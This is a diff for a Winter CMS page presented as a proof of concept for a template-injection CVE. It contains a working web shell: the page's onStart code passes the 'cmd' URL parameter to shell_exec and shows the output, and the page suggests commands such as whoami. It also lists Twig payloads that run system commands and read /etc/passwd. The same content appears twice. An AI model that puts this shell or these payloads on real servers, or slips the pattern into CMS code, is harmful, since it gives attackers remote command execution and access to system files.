RajChowdhury240 · February 6, 2026 22:47
diff --git a/winter-cms-home.htm b/winter-cms-home.htm
 title = "Demonstration"
 url = "/"
 layout = "default"
 ==
 function onStart()
 {
    // SSTI Proof of Concept - Command Execution
    $this['var'] = 'Winter CMS';
    
    // RCE: Execute system command through PHP code section
    $cmd = input('cmd', 'id');
    $this['rce_result'] = shell_exec($cmd);
    
    // Alternative: Direct PHP code execution demonstration
    $this['php_version'] = phpversion();
    $this['system_info'] = php_uname();
 }
 ==
 <h1 class="display-1">SSTI/RCE Proof of Concept</h1>

 <div class="alert alert-danger">
    <h4>⚠️ Vulnerability Demonstration</h4>
    <p>This page demonstrates <strong>CVE-2024-29686</strong> - Server-Side Template Injection (SSTI) in Winter CMS v1.2.3</p>
 </div>

 <div class="panel panel-default">
    <div class="panel-heading">
        <h3 class="panel-title">Remote Code Execution via Template Code Section</h3>
    </div>
    <div class="panel-body">
        <p><strong>Variable Value:</strong> {{ var }}</p>
        <p><strong>PHP Version:</strong> {{ php_version }}</p>
        <p><strong>System Info:</strong> {{ system_info }}</p>
        
        <hr>
        
        <h4>Command Execution Result:</h4>
        <pre style="background:#f5f5f5;padding:10px;border:1px solid #ddd;">{{ rce_result|default('No command executed. Try adding ?cmd=whoami to the URL') }}</pre>
        
        <p class="text-muted">
            <small>Try accessing: <code>?cmd=whoami</code> or <code>?cmd=ls -la</code></small>
        </p>
    </div>
 </div>

 <div class="panel panel-warning">
    <div class="panel-heading">
        <h3 class="panel-title">Twig SSTI Payload Examples</h3>
    </div>
    <div class="panel-body">
        <p>If Twig markup was stored from user input, these payloads would execute:</p>
        <ul>
            <li><code>{% verbatim %}{{ ['id']|filter('system') }}{% endverbatim %}</code> - Execute system commands via Twig filters</li>
            <li><code>{% verbatim %}{{ _self.env.getFilter('system').callback(['whoami']) }}{% endverbatim %}</code> - Access Twig internals</li>
            <li><code>{% verbatim %}{{ ['cat /etc/passwd']|map('shell_exec')|join }}{% endverbatim %}</code> - Read system files</li>
        </ul>
    </div>
 </div>

 <div class="alert alert-info">
    <h4>Technical Details</h4>
    <ul>
        <li><strong>CVE ID:</strong> CVE-2024-29686</li>
        <li><strong>Affected Versions:</strong> Winter CMS ≤ v1.2.3</li>
        <li><strong>Severity:</strong> HIGH (CVSS: 8.8)</li>
        <li><strong>Attack Vector:</strong> Authenticated admin access to CMS templates</li>
    </ul>
 </div>
	title = "Demonstration"
	url = "/"
	layout = "default"
	==
	function onStart()
	{
	// SSTI Proof of Concept - Command Execution
	$this['var'] = 'Winter CMS';

	// RCE: Execute system command through PHP code section
	$cmd = input('cmd', 'id');
	$this['rce_result'] = shell_exec($cmd);

	// Alternative: Direct PHP code execution demonstration
	$this['php_version'] = phpversion();
	$this['system_info'] = php_uname();
	}
	==
	<h1 class="display-1">SSTI/RCE Proof of Concept</h1>

	<div class="alert alert-danger">
	<h4>⚠️ Vulnerability Demonstration</h4>
	<p>This page demonstrates <strong>CVE-2024-29686</strong> - Server-Side Template Injection (SSTI) in Winter CMS v1.2.3</p>
	</div>

	<div class="panel panel-default">
	<div class="panel-heading">
	<h3 class="panel-title">Remote Code Execution via Template Code Section</h3>
	</div>
	<div class="panel-body">
	<p><strong>Variable Value:</strong> {{ var }}</p>
	<p><strong>PHP Version:</strong> {{ php_version }}</p>
	<p><strong>System Info:</strong> {{ system_info }}</p>

	<hr>

	<h4>Command Execution Result:</h4>
	<pre style="background:#f5f5f5;padding:10px;border:1px solid #ddd;">{{ rce_result\|default('No command executed. Try adding ?cmd=whoami to the URL') }}</pre>

	<p class="text-muted">
	<small>Try accessing: <code>?cmd=whoami</code> or <code>?cmd=ls -la</code></small>
	</p>
	</div>
	</div>

	<div class="panel panel-warning">
	<div class="panel-heading">
	<h3 class="panel-title">Twig SSTI Payload Examples</h3>
	</div>
	<div class="panel-body">
	<p>If Twig markup was stored from user input, these payloads would execute:</p>
	<ul>
	<li><code>{% verbatim %}{{ ['id']\|filter('system') }}{% endverbatim %}</code> - Execute system commands via Twig filters</li>
	<li><code>{% verbatim %}{{ _self.env.getFilter('system').callback(['whoami']) }}{% endverbatim %}</code> - Access Twig internals</li>
	<li><code>{% verbatim %}{{ ['cat /etc/passwd']\|map('shell_exec')\|join }}{% endverbatim %}</code> - Read system files</li>
	</ul>
	</div>
	</div>

	<div class="alert alert-info">
	<h4>Technical Details</h4>
	<ul>
	<li><strong>CVE ID:</strong> CVE-2024-29686</li>
	<li><strong>Affected Versions:</strong> Winter CMS ≤ v1.2.3</li>
	<li><strong>Severity:</strong> HIGH (CVSS: 8.8)</li>
	<li><strong>Attack Vector:</strong> Authenticated admin access to CMS templates</li>
	</ul>
	</div>
No results found